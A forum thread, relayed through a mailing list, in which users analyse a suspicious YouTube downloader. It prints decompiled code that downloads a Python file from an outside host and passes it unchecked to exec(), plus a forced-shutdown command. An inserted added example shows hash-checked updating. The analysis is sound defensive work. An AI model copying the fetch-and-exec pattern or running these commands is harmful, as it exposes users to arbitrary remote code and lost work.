Re: Best Recommendations for Downloading Youtube Videos

Krantikari, have you read any of this? This is from the topic that was made about this a long time ago.

Really look. You don't just fix, something like Posts start.

OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to VirusTotal). Analyzing the installed program in my sandbox, I notice many things off the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled Python bytecode. At this stage decompilation is trivial: I see that the app has the standard Python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?
Oh dear! Some suspicious code! Looky, friends:
import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())
Looking at this "max.py" file...
First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.
Next, it tries to change to c:\ProgramData\MultiExtra. Not sure how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.
The worrying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on Softpedia for some reason.)
We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:
Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
It also runs command prompt:
Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
And this...
Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
And, of course, the end of the application, when it tries to taskkill itself instead of exiting properly:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Some things to note with these subprocess calls:
* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.
* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what it's trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).
* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) tells it to do an immediate shutdown.
There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.
As for the "this program steals files" accusation, I'm checking on that.
OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copies, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).
In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to dive into that mess of code) can fully analyze it. In the meantime, I would hold off on using it lest you get hit by something we have not found.

Lucas1853
2019-05-20 11:50 am
Altered being
Offline
The thing is, it doesn't matter if MAX.py is the most harmless program ever made right now. Fact is, it could become devastatingly harmful, because it's downloading from an external source, I presume every time you open the app. Do not trust this program.

2019-05-20 11:54 am
hero caller
Offline
Blind Extra did something similar I believe. It downloaded then executed some Python file that could do just about anything...

Ethin
2019-05-20 12:55 pm
Stellar beater
Offline
39-41, exactly why I recommended people don't use it until we can examine it further. The fact that it immediately downloads code when you run it is incredibly suspicious and brings into question what the developer is trying to do. All three of you are correct in saying that, since the code is hosted on a server, it could be changed. The fact that it calls exec and not some kind of sanitized eval (I don't get why you'd use eval or exec, period; it's dangerous) makes it a threat. The code can do literally anything it likes so long as it's valid syntax.

jaybird
2019-05-21 3:36 pm
Swamp machine
Offline
Guys, it's the principle of the thing. If I understand post 36 correctly, pretty much the first thing this program does when you run it is to download another program. That's bad enough, but again if I understand correctly, it then does absolutely no checks of what it just downloaded. It doesn't do any digital signature or hashing checks, it doesn't look at the downloaded program in any way. In fact, it doesn't even do so much as to check that what it received is, in fact, a Python program and not, say, an error document or some unrelated file. It just blindly executes it anyway. This is bad on so many levels it's not even funny. Putting aside for the moment the obvious scenario where the developer has put out this really nice program, then later decides to modify the downloaded program file to do something nasty, let's look at something even worse. Suppose someone else knows how this program works, and wants to have a little fun at the developer's expense. So they hack into the developer's website and upload their own program in place of the correct one. So now, since the software does no integrity checks whatsoever, it downloads the new Python code uploaded by the hacker instead of the intended Python code, and this new code might do absolutely anything!
This is extremely dangerous! It might be just fine today, but then tomorrow, with absolutely no change to the program you run, it turns nasty. Nobody, and I mean absolutely nobody! can review this software anywhere at all, on Youtube, on a blog, etc. Since it downloads Python code at startup, nobody can know for certain what it will do. For this reason, nobody's review can be trusted.
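The checks jaybird describes as missing (a digest or signature check, and at least a sanity check that the download is Python and not an error page) look like the following. This is an added example, not code from MultiExtra or from anyone in the thread; the payloads are constructed, and a SHA-256 digest pinned in the installed program stands in for the signature a production updater would verify.

```python
import hashlib
import hmac
from typing import Tuple

# Constructed sample payloads standing in for what a downloader might receive.
GOOD_UPDATE = b"def greet():\n    return 'hello from update'\n"
HTML_ERROR = b"<html><body><h1>404 Not Found</h1></body></html>\n"
TAMPERED = b"def greet():\n    return 'hello from update'\nimport os\n"

# Digest of the reviewed file, shipped inside the installed program. Because it
# changes with every legitimate release, real updaters verify a signature over
# the file instead; the pinned hash keeps this stdlib-only while making the
# same point: the client decides what it will run, not whoever controls the host.
PINNED_SHA256 = hashlib.sha256(GOOD_UPDATE).hexdigest()


def verify_update(payload: bytes, pinned_sha256: str) -> Tuple[bool, str]:
    """Return (ok, reason). Never executes the payload.

    Order matters: the integrity check runs first so that nothing is parsed,
    let alone executed, unless the bytes are exactly what was reviewed.
    """
    digest = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(digest, pinned_sha256):
        return False, "sha256 mismatch: got " + digest
    # Even a matching file is compiled before use; a download that is an HTML
    # error document or a truncated transfer fails here instead of inside exec().
    try:
        compile(payload, "<update>", "exec")
    except SyntaxError as exc:
        return False, "not valid Python: " + str(exc)
    return True, "ok"


def load_update(payload: bytes, pinned_sha256: str) -> dict:
    """Execute the payload in a fresh namespace only after it verifies."""
    ok, reason = verify_update(payload, pinned_sha256)
    if not ok:
        raise RuntimeError("refusing to run update: " + reason)
    namespace: dict = {}
    exec(compile(payload, "<update>", "exec"), namespace)
    return namespace
```

With this in place, the scenario in the post (the hosted MAX.py is swapped for something else) ends in a refused update rather than in arbitrary code running on the user's machine.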

-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector